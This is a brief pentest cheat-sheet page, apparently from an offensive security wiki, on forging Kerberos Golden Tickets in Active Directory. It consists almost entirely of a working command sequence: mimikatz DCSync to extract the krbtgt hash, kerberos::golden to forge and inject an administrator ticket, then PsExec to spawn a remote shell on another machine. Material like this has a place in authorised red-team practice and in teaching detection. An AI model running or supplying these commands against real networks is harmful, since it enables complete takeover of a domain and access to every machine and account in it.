Golden Ticket Attacks
What is it?
When the
krbtgt
account is compromised, the domain is ownedAccess can be requested to any resource or system on the domain
Golden tickets == complete access to every machine// Some code
# Start mimikatz with privilege::debug
# Grab the krbtgt hash using DCSync
lsadump::dcsync /user:DOMAIN\\krbtgt
# Grab the domain SID and the krbtgt password hash
# Generate the Golden ticket
kerberos::golden /User:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /id:500 /ptt
# Now you should be able to open sessions using the golden ticket
misc::cmd
# Now you should be able to access all resources using the golden ticket
# For example: start a remote cmd.exe using psexec
PsExec.exe \\REMOTE_IP cmd.exe
Reference: Attacking Kerberos
Last updated